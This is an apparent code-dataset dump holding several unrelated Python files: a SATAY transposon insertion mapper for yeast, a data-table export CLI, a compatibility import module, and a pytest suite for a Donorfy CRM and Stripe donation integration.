hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9e8e6d830985755cf872faa18feca1ac284fe14d | 11,042 | py | Python | transposonmapper/transposonmapper.py | EKingma/Transposonmapper | 1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b | [
"Apache-2.0"
]
| 2 | 2021-11-23T09:39:35.000Z | 2022-01-25T15:49:45.000Z | transposonmapper/transposonmapper.py | EKingma/Transposonmapper | 1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b | [
"Apache-2.0"
]
| 76 | 2021-07-07T18:31:44.000Z | 2022-03-22T10:04:40.000Z | transposonmapper/transposonmapper.py | EKingma/Transposonmapper | 1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b | [
"Apache-2.0"
]
| 2 | 2021-09-16T10:56:20.000Z | 2022-01-25T12:33:25.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This is a tool developed for analysing transposon insertions for experiments using SAturated Transposon Analysis in Yeast (SATAY).
This python code contains one function called transposonmapper().
For more information about this code and the project, see https://satay-ll.github.io/SATAY-jupyter-book/Introduction.html
This code is based on the Matlab code created by the Kornmann lab which is available at: sites.google.com/site/satayusers/
__Author__ = Gregory van Beek. LaanLab, department of Bionanoscience, Delft University of Technology
__version__ = 1.5
__Date last update__ = 2021-01-11
Version history:
1.1; Added code for creating two text files for storing insertion locations per gene and per essential gene [2020-07-27]
1.2; Improved searching algorithm for essential genes [2020-08-06]
1.3; Load file containing all essential genes so that a search for essential genes in multiple file is not needed anymore. This file is created using Create_EssentialGenes_list.py located in the same directory as this code [2020-08-07]
1.4; Fixed bug where the gene position and transposon insertion location did not start at zero for each chromosome, causing confusing values to be stored in the _pergene_insertions.txt and _peressential_insertions.txt files [2020-08-09]
1.5; Added functionality to handle all possible sam flags in the alignment file (bam-file) instead of only flag=0 or flag=16. This is needed for the function to handle paired-end sequencing data [2021-01-11]
"""
# Local imports
from transposonmapper.properties import (
get_chromosome_names,
get_sequence_length,
)
from transposonmapper.mapping import (
get_reads,
add_chromosome_length,
add_chromosome_length_inserts,
get_insertions_and_reads,
)
from transposonmapper.utils import chromosomename_roman_to_arabic
from transposonmapper.importing import (
load_default_files,
read_genes,
)
from transposonmapper.exporting import (
save_as_bed,
save_per_gene,
save_per_gene_insertions,
save_per_essential_insertions,
save_as_wig
)
import sys
def transposonmapper(bamfile, gff_file=None, essential_file=None, gene_name_file=None):
"""This function is created for analysis of SATAY data using the species Saccharomyces Cerevisiae.
The function assumes that the reads are already aligned to a reference genome.
The input data should be a .bam-file and the location where the .bam-file is stored should also contain an index file (.bam.bai-file, which for example can be created using sambamba).
The function uses the pysam package for handling bam files (see pysam.readthedocs.io/en/latest/index.html) and therefore this function only runs on Linux systems with SAMTools installed.
Parameters
----------
bamfile : str, required
Path to the bamfile. This location should also contain the .bam.bai index file (does not need to be input in this function).
gff_file : str, optional
Path to a .gff-file including all gene information (e.g. downloaded from SGD).
Default file is 'Saccharomyces_cerevisiae.R64-1-1.99.gff3'., by default None
essential_file : str, optional
Path to a .txt file containing a list all essential genes. Every line should consist of a single essential gene and the file should have one header line.
Ideally this file is created using 'Create_EssentialGenes_list.py'. Default file is 'Cerevisiae_AllEssentialGenes_List.txt'., by default None
gene_name_file : str, optional
Path to text file that includes aliases for all genes. Default file is 'Yeast_Protein_Names.txt', by default None
Returns
-------
A set of files
It outputs the following files that store information regarding the location of all insertions:
- .bed-file: Includes all individual basepair locations of the whole genome where at least one transposon has been mapped and the number of insertions for each locations (the number of reads) according to the Browser Extensible Data (bed) format.
A distinction is made between reads that had a different reading orientation during sequencing. The number of reads are stored using the equation #reads*20+100 (e.g. 2 reads is stored as 140).
- .wig-file: Includes all individual basepair locations of the whole genome where at least one transposon has been mapped and the number of insertions for each locations (the number of reads) according to the Wiggle (wig) format.
In this file no distinction is made between reads that had a different reading orientation during sequencing. The number of reads are stored as the absolute count.
- _pergene.txt-file: Includes all genes (currently 6600) with the total number of insertions and number of reads within the genomic region of the gene.
- _peressential.txt-file: Includes all annotated essential genes (currently 1186) with the total number of insertions and number of reads within the genomic region of the gene.
- _pergene_insertions.txt-file: Includes all genes with their genomic location (i.e. chromosome number, start and end position) and the locations of all insertions within the gene location. It also include the number number of reads per insertions.
- _peressential_insertions.txt-file: Includes all essential genes with their genomic location (i.e. chromosome number, start and end position) and the locations of all insertions within the gene location. It also include the number number of reads per insertions.
(note that in the latter two files, the genomic locations are continous, for example chromosome II does not start at 0, but at 'length chromosome I + 1' etc.).
The output files are saved at the location of the input file using the same name as the input file, but with the corresponding extension.
"""
# If necessary, load default files
gff_file, essential_file, gene_name_file = load_default_files(
gff_file, essential_file, gene_name_file
)
# Verify presence of files
data_files = {
"bam": bamfile,
"gff3": gff_file,
"essentials": essential_file,
"gene_names": gene_name_file,
}
for filetype, file_path in data_files.items():
assert file_path, f"{filetype} not found at {file_path}"
# Read files for all genes and all essential genes
print("Getting coordinates of all genes ...")
gene_coordinates, essential_coordinates, aliases_designation = read_genes(
gff_file, essential_file, gene_name_file
)
try:
import pysam
except ImportError:
print("Failed to import pysam")
sys.exit(1)
# Read bam file
bam = pysam.AlignmentFile(bamfile, "rb")
# Get names of all chromosomes as stored in the bam file
ref_tid = get_chromosome_names(bam)
ref_names = list(ref_tid.keys())
# Convert chromosome names in data file to roman numerals
ref_romannums = chromosomename_roman_to_arabic()[1]
ref_tid_roman = {key: value for key, value in zip(ref_romannums, ref_tid)}
# Get sequence lengths of all chromosomes
chr_lengths, chr_lengths_cumsum = get_sequence_length(bam)
# Get all reads within a specified genomic region
readnumb_array, tncoordinates_array, tncoordinatescopy_array = get_reads(bam)
#%% CONCATENATE ALL CHROMOSOMES
# For each insertion location, add the length of all previous chromosomes
tncoordinatescopy_array = add_chromosome_length_inserts(
tncoordinatescopy_array, ref_names, chr_lengths
)
# For each gene location, add the length of all previous chromosomes
gene_coordinates = add_chromosome_length(
gene_coordinates, chr_lengths_cumsum, ref_tid_roman
)
# For each essential gene location, add the length of all previous chromosomes
essential_coordinates = add_chromosome_length(
essential_coordinates, chr_lengths_cumsum, ref_tid_roman
)
# GET NUMBER OF TRANSPOSONS AND READS PER GENE
print("Get number of insertions and reads per gene ...")
# All genes
tn_per_gene, reads_per_gene, tn_coordinates_per_gene = get_insertions_and_reads(
gene_coordinates, tncoordinatescopy_array, readnumb_array
)
# Only essential genes
(
tn_per_essential,
reads_per_essential,
tn_coordinates_per_essential,
) = get_insertions_and_reads(
essential_coordinates, tncoordinatescopy_array, readnumb_array
)
# CREATE BED FILE
bedfile = bamfile + ".bed"
print("Writing bed file at: ", bedfile)
print("")
save_as_bed(bedfile, tncoordinates_array, ref_tid, readnumb_array)
# CREATE TEXT FILE WITH TRANSPOSONS AND READS PER GENE
# NOTE THAT THE TRANSPOSON WITH THE HIGHEST READ COUNT IS IGNORED.
# E.G. IF THIS FILE IS COMPARED WITH THE _PERGENE_INSERTIONS.TXT FILE THE READS DON'T ADD UP (SEE https://groups.google.com/forum/#!category-topic/satayusers/bioinformatics/uaTpKsmgU6Q)
# TOO REMOVE THIS HACK, CHANGE THE INITIALIZATION OF THE VARIABLE readpergene
per_gene_file = bamfile + "_pergene.txt"
print("Writing pergene.txt file at: ", per_gene_file)
print("")
save_per_gene(per_gene_file, tn_per_gene, reads_per_gene, aliases_designation)
# CREATE TEXT FILE TRANSPOSONS AND READS PER ESSENTIAL GENE
per_essential_file = bamfile + "_peressential.txt"
print("Writing peressential.txt file at: ", per_essential_file)
print("")
save_per_gene(
per_essential_file, tn_per_essential, reads_per_essential, aliases_designation
)
# CREATE TEXT FILE WITH LOCATION OF INSERTIONS AND READS PER GENE
per_gene_insertions_file = bamfile + "_pergene_insertions.txt"
print("Witing pergene_insertions.txt file at: ", per_gene_insertions_file)
print("")
save_per_gene_insertions(
per_gene_insertions_file,
tn_coordinates_per_gene,
gene_coordinates,
chr_lengths_cumsum,
ref_tid_roman,
aliases_designation,
)
# CREATE TEXT FILE WITH LOCATION OF INSERTIONS AND READS PER ESSENTIAL GENE
per_essential_insertions_file = bamfile + "_peressential_insertions.txt"
print(
"Writing peressential_insertions.txt file at: ", per_essential_insertions_file
)
print("")
save_per_essential_insertions(
per_essential_insertions_file,
tn_coordinates_per_essential,
gene_coordinates,
chr_lengths_cumsum,
ref_tid_roman,
aliases_designation,
)
# ADD INSERTIONS AT SAME LOCATION BUT WITH DIFFERENT ORIENTATIONS TOGETHER (FOR STORING IN WIG-FILE)
wigfile = bamfile + ".wig"
print("Writing wig file at: ", wigfile)
print("")
save_as_wig(wigfile, tncoordinates_array, ref_tid, readnumb_array)
#%%
if __name__ == "__main__":
bamfile = "transposonmapper/data_files/files4test/SRR062634.filt_trimmed.sorted.bam"
transposonmapper(bamfile=bamfile)
| 46.394958 | 271 | 0.741442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,223 | 0.654139 |
9e8f1e152b11b2dfb1cd7fa118a719d6c95eed5d | 1,975 | py | Python | DataTable/Tool/Tool.py | BoilTask/DataTable | d49afe9c43b0a247bc9bc6cceacdd912670eeed9 | [
"MIT"
]
| 5 | 2020-08-07T17:31:13.000Z | 2022-03-03T07:44:29.000Z | DataTable/Tool/Tool.py | BoilTask/DataTable | d49afe9c43b0a247bc9bc6cceacdd912670eeed9 | [
"MIT"
]
| null | null | null | DataTable/Tool/Tool.py | BoilTask/DataTable | d49afe9c43b0a247bc9bc6cceacdd912670eeed9 | [
"MIT"
]
| 1 | 2022-03-03T07:44:32.000Z | 2022-03-03T07:44:32.000Z | # -*- coding: UTF-8 -*-
import sys
from datatable import datatable
def process_file(file_id):
print("1.export_data")
print("2.generate_code & export_data")
choose_idx = input("plase choose : ")
if choose_idx == "1":
datatable.export_data(file_id)
elif choose_idx == "2":
datatable.generate_code(file_id)
datatable.export_data(file_id)
else:
print("not valid!")
def process_all_file_choose():
print("1.export_data")
print("2.generate_enum")
print("3.register_datatable")
print("4.generate_code & export_data")
print("0.all")
choose_idx = input("please choose : ")
if choose_idx == "0":
datatable.process_all_file()
elif choose_idx == "1":
datatable.export_data_all()
elif choose_idx == "2":
datatable.generate_enum()
elif choose_idx == "3":
datatable.register_datatable()
elif choose_idx == "4":
datatable.clean_export_data()
datatable.clean_generate_code()
datatable.export_data_generate_code_all()
if __name__ == "__main__":
if datatable.is_config_file_valid():
if len(sys.argv) > 1:
if sys.argv[1] == "all":
datatable.process_all_file()
elif sys.argv[1] == "export":
datatable.export_data_all()
exit(0)
# 用户选择
print("Init Success!")
print("-------------")
file_dict = datatable.get_file_dict()
for file_key in file_dict:
print(str(file_key) + "." + file_dict[file_key][3:])
print("0.All")
print("-------------")
file_choose = input("Choose File : ")
if file_choose == "0":
process_all_file_choose()
else:
file_id = datatable.select_file_id(file_choose)
if file_id < 0:
print("not valid!")
else:
process_file(file_id)
else:
print("not valid!")
| 27.816901 | 64 | 0.571646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 364 | 0.18356 |
9e922e429bd689190580fd828c6525764ab943c0 | 1,268 | py | Python | tower_cli/compat.py | kedark3/tower-cli | 487a1b9a8e96509798fee108e4f7d2c187177771 | [
"Apache-2.0"
]
| 363 | 2015-01-14T17:48:34.000Z | 2022-01-29T06:37:04.000Z | tower_cli/compat.py | kedark3/tower-cli | 487a1b9a8e96509798fee108e4f7d2c187177771 | [
"Apache-2.0"
]
| 703 | 2015-01-06T17:17:20.000Z | 2020-09-16T15:54:17.000Z | tower_cli/compat.py | kedark3/tower-cli | 487a1b9a8e96509798fee108e4f7d2c187177771 | [
"Apache-2.0"
]
| 203 | 2015-01-18T22:38:23.000Z | 2022-01-28T19:19:05.000Z | # Copyright 2015, Ansible, Inc.
# Luke Sneeringer <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Import OrderedDict from the standard library if possible, and from
# the ordereddict library (required on Python 2.6) otherwise.
try:
from collections import OrderedDict # NOQA
except ImportError: # Python < 2.7
from ordereddict import OrderedDict # NOQA
# Import simplejson if we have it (Python 2.6), and use json from the
# standard library otherwise.
#
# Note: Python 2.6 does have a JSON library, but it lacks `object_pairs_hook`
# as a keyword argument to `json.loads`, so we still need simplejson on
# Python 2.6.
import sys
if sys.version_info < (2, 7):
import simplejson as json # NOQA
else:
import json # NOQA
| 36.228571 | 77 | 0.746057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,035 | 0.816246 |
9e92a7a7b55047819665042784eb05a1717697c3 | 19,250 | py | Python | py/tests/test_donorfy.py | samuelcolvin/nosht | 9e4d9bea8ff6bfae86cae948cc3028ccc68d0188 | [
"MIT"
]
| 26 | 2018-07-28T23:11:27.000Z | 2022-02-09T13:40:33.000Z | py/tests/test_donorfy.py | samuelcolvin/nosht | 9e4d9bea8ff6bfae86cae948cc3028ccc68d0188 | [
"MIT"
]
| 336 | 2018-05-25T17:57:00.000Z | 2022-03-11T23:24:36.000Z | py/tests/test_donorfy.py | samuelcolvin/nosht | 9e4d9bea8ff6bfae86cae948cc3028ccc68d0188 | [
"MIT"
]
| 4 | 2018-07-18T08:37:19.000Z | 2022-01-31T14:42:48.000Z | import json
import pytest
from buildpg import Values
from pytest import fixture
from pytest_toolbox.comparison import CloseToNow, RegexStr
from shared.actions import ActionTypes
from shared.donorfy import DonorfyActor
from shared.utils import RequestError
from web.utils import encrypt_json
from .conftest import Factory
@fixture(name='donorfy')
async def create_donorfy(settings, db_pool):
settings.donorfy_api_key = 'standard'
settings.donorfy_access_key = 'donorfy-access-key'
don = DonorfyActor(settings=settings, pg=db_pool, concurrency_enabled=False)
await don.startup()
redis = await don.get_redis()
await redis.flushdb()
yield don
await don.close(shutdown=True)
async def test_create_host_existing(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await donorfy.host_signuped(factory.user_id)
await donorfy.host_signuped(factory.user_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
]
async def test_create_host_new(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'new-user'
await donorfy.host_signuped(factory.user_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/new-user/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/new-user/constituents/EmailAddress/[email protected]',
f'POST donorfy_api_root/new-user/constituents',
]
async def test_create_event(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(long_description='test ' * 100)
await donorfy.event_created(factory.event_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/constituents/123456/AddActiveTags',
f'POST donorfy_api_root/standard/activities',
]
activity_data = dummy_server.app['data']['/donorfy_api_root/standard/activities 201']
assert activity_data['Code1'] == '/supper-clubs/the-event-name/'
assert activity_data['Code3'] == 'test test test test test test test test test...'
assert 'Code2' not in activity_data
async def test_create_event_no_duration(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10, duration=None)
donorfy.settings.donorfy_api_key = 'no-users'
await donorfy.event_created(factory.event_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/no-users/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
f'POST donorfy_api_root/no-users/constituents',
f'POST donorfy_api_root/no-users/constituents/456789/AddActiveTags',
f'POST donorfy_api_root/no-users/activities',
]
async def test_book_tickets(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10)
res = await factory.create_reservation()
await factory.buy_tickets(res)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/activities',
f'GET stripe_root_url/balance/history/txn_charge-id',
f'POST donorfy_api_root/standard/transactions',
(
'email_send_endpoint',
'Subject: "The Event Name Ticket Confirmation", To: "Frank Spencer <[email protected]>"',
),
]
async def test_book_tickets_free(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event()
action_id = await factory.book_free(await factory.create_reservation())
await donorfy.tickets_booked(action_id)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/activities',
]
async def test_book_tickets_multiple(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(duration=None)
donorfy.settings.donorfy_api_key = 'no-users'
ben = await factory.create_user(first_name='ben', email='[email protected]')
charlie = await factory.create_user(first_name='charlie', email='[email protected]')
danial = await factory.create_user(first_name='danial', email='[email protected]')
res = await factory.create_reservation(factory.user_id, ben, charlie, danial)
action_id = await factory.book_free(res)
v = await db_conn.execute('update tickets set user_id=null where user_id=$1', danial)
assert v == 'UPDATE 1'
await donorfy.tickets_booked(action_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/no-users/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
f'POST donorfy_api_root/no-users/constituents',
f'POST donorfy_api_root/no-users/activities',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{ben}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
f'GET donorfy_api_root/no-users/constituents/ExternalKey/nosht_{charlie}',
f'GET donorfy_api_root/no-users/constituents/EmailAddress/[email protected]',
}
async def test_book_tickets_extra(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn):
await factory.create_company()
await factory.create_user()
await factory.create_cat(cover_costs_percentage=10)
await factory.create_event(status='published', price=100)
res = await factory.create_reservation()
action_id = await db_conn.fetchval_b(
'INSERT INTO actions (:values__names) VALUES :values RETURNING id',
values=Values(
company=factory.company_id,
user_id=factory.user_id,
type=ActionTypes.buy_tickets,
event=factory.event_id,
extra=json.dumps({'stripe_balance_transaction': 'txn_testing'}),
),
)
await db_conn.execute(
"UPDATE tickets SET status='booked', booked_action=$1 WHERE reserve_action=$2", action_id, res.action_id,
)
await db_conn.execute('update tickets set extra_donated=10')
await donorfy.tickets_booked(action_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/standard/constituents/123456',
f'POST donorfy_api_root/standard/activities',
f'GET stripe_root_url/balance/history/txn_testing',
f'POST donorfy_api_root/standard/transactions',
f'POST donorfy_api_root/standard/transactions/trans_123/AddAllocation',
f'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
}
async def test_book_multiple(donorfy: DonorfyActor, factory: Factory, dummy_server, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_user(first_name='T', last_name='B', email='[email protected]')
await factory.create_event(status='published', price=10)
await login(email='[email protected]')
data = {
'tickets': [
{'t': True, 'email': '[email protected]'},
{'t': True, 'email': '[email protected]'},
],
'ticket_type': factory.ticket_type_id,
}
r = await cli.json_post(url('event-reserve-tickets', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
await factory.fire_stripe_webhook(action_id)
trans_data = dummy_server.app['post_data']['POST donorfy_api_root/standard/transactions']
assert len(trans_data) == 1
assert trans_data[0] == {
'ExistingConstituentId': '123456',
'Channel': 'nosht-supper-clubs',
'Currency': 'gbp',
'Campaign': 'supper-clubs:the-event-name',
'PaymentMethod': 'Payment Card via Stripe',
'Product': 'Event Ticket(s)',
'Fund': 'Unrestricted General',
'Department': '220 Ticket Sales',
'BankAccount': 'Unrestricted Account',
'DatePaid': CloseToNow(delta=4),
'Amount': 20.0,
'ProcessingCostsAmount': 0.5,
'Quantity': 2,
'Acknowledgement': 'supper-clubs-thanks',
'AcknowledgementText': RegexStr('Ticket ID: .*'),
'Reference': 'Events.HUF:supper-clubs the-event-name',
'AddGiftAidDeclaration': False,
'GiftAidClaimed': False,
}
async def test_book_offline(donorfy: DonorfyActor, factory: Factory, dummy_server, cli, url, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event(price=10)
await login()
res = await factory.create_reservation()
app = cli.app['main_app']
data = dict(booking_token=encrypt_json(app, res.dict()), book_action='buy-tickets-offline')
r = await cli.json_post(url('event-book-tickets'), data=data)
assert r.status == 200, await r.text()
assert 'POST donorfy_api_root/standard/transactions' not in dummy_server.app['post_data']
async def test_donate(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10)
await factory.create_donation_option()
await login()
r = await cli.json_post(
url('donation-after-prepare', don_opt_id=factory.donation_option_id, event_id=factory.event_id)
)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
post_data = dict(
title='Mr',
first_name='Joe',
last_name='Blogs',
address='Testing Street',
city='Testingville',
postcode='TE11 0ST',
)
r = await cli.json_post(url('donation-gift-aid', action_id=action_id), data=post_data)
assert r.status == 200, await r.text()
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
await factory.fire_stripe_webhook(action_id, amount=20_00, purpose='donate')
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
assert dummy_server.app['log'] == [
'POST stripe_root_url/customers',
'POST stripe_root_url/payment_intents',
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/standard/constituents/123456',
'GET stripe_root_url/balance/history/txn_charge-id',
'POST donorfy_api_root/standard/transactions',
'POST donorfy_api_root/standard/constituents/123456/GiftAidDeclarations',
('email_send_endpoint', 'Subject: "Thanks for your donation", To: "Frank Spencer <[email protected]>"'),
]
async def test_donate_no_gift_aid(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10)
await factory.create_donation_option()
await login()
r = await cli.json_post(
url('donation-after-prepare', don_opt_id=factory.donation_option_id, event_id=factory.event_id)
)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
await factory.fire_stripe_webhook(action_id, amount=20_00, purpose='donate')
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
assert dummy_server.app['log'] == [
'POST stripe_root_url/customers',
'POST stripe_root_url/payment_intents',
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/standard/constituents/123456',
'GET stripe_root_url/balance/history/txn_charge-id',
'POST donorfy_api_root/standard/transactions',
('email_send_endpoint', 'Subject: "Thanks for your donation", To: "Frank Spencer <[email protected]>"'),
]
async def test_update_user(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await donorfy.update_user(factory.user_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'PUT donorfy_api_root/standard/constituents/123456',
'POST donorfy_api_root/standard/constituents/123456/Preferences',
}
async def test_update_user_neither(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
await donorfy.update_user(factory.user_id, update_user=False, update_marketing=False)
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
]
async def test_update_user_no_user(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'no-user'
await donorfy.update_user(factory.user_id)
assert set(dummy_server.app['log']) == {
f'GET donorfy_api_root/no-user/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/no-user/constituents/EmailAddress/[email protected]',
'POST donorfy_api_root/no-user/constituents',
'POST donorfy_api_root/no-user/constituents/456789/Preferences',
}
async def test_get_user_update(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'no-ext-id'
const_id = await donorfy._get_constituent(user_id=factory.user_id, email='[email protected]')
assert const_id == '456789'
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/no-ext-id/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/no-ext-id/constituents/EmailAddress/[email protected]',
'PUT donorfy_api_root/no-ext-id/constituents/456789',
]
async def test_get_user_wrong_id(donorfy: DonorfyActor, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_user()
donorfy.settings.donorfy_api_key = 'wrong-ext-id'
const_id = await donorfy._get_constituent(user_id=factory.user_id, email='[email protected]')
assert const_id is None
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/wrong-ext-id/constituents/ExternalKey/nosht_{factory.user_id}',
f'GET donorfy_api_root/wrong-ext-id/constituents/EmailAddress/[email protected]',
]
async def test_bad_response(donorfy: DonorfyActor, dummy_server):
with pytest.raises(RequestError):
await donorfy.client.get('/foobar')
assert dummy_server.app['log'] == [
'GET donorfy_api_root/standard/foobar',
]
async def test_campaign_exists(donorfy: DonorfyActor, dummy_server):
await donorfy._get_or_create_campaign('supper-clubs', 'the-event-name')
assert dummy_server.app['log'] == ['GET donorfy_api_root/standard/System/LookUpTypes/Campaigns']
await donorfy._get_or_create_campaign('supper-clubs', 'the-event-name')
assert dummy_server.app['log'] == ['GET donorfy_api_root/standard/System/LookUpTypes/Campaigns'] # cached
async def test_campaign_new(donorfy: DonorfyActor, dummy_server):
await donorfy._get_or_create_campaign('supper-clubs', 'foobar')
assert dummy_server.app['log'] == [
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
'POST donorfy_api_root/standard/System/LookUpTypes/Campaigns',
]
await donorfy._get_or_create_campaign('supper-clubs', 'foobar')
assert len(dummy_server.app['log']) == 2
async def test_get_constituent_update_campaign(donorfy: DonorfyActor, dummy_server):
donorfy.settings.donorfy_api_key = 'default-campaign'
await donorfy._get_constituent(user_id=123, campaign='foo:bar')
assert dummy_server.app['log'] == [
f'GET donorfy_api_root/default-campaign/constituents/ExternalKey/nosht_123',
'GET donorfy_api_root/default-campaign/constituents/123456',
'PUT donorfy_api_root/default-campaign/constituents/123456',
]
async def test_donate_direct(donorfy: DonorfyActor, factory: Factory, dummy_server, db_conn, cli, url, login):
await factory.create_company()
await factory.create_user()
await factory.create_cat()
await factory.create_event(price=10, allow_donations=True, status='published')
await login()
r = await cli.json_post(
url('donation-direct-prepare', tt_id=factory.donation_ticket_type_id_1), data=dict(custom_amount=123),
)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
await factory.fire_stripe_webhook(action_id, amount=20_00, purpose='donate-direct')
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
assert dummy_server.app['log'] == [
'POST stripe_root_url/customers',
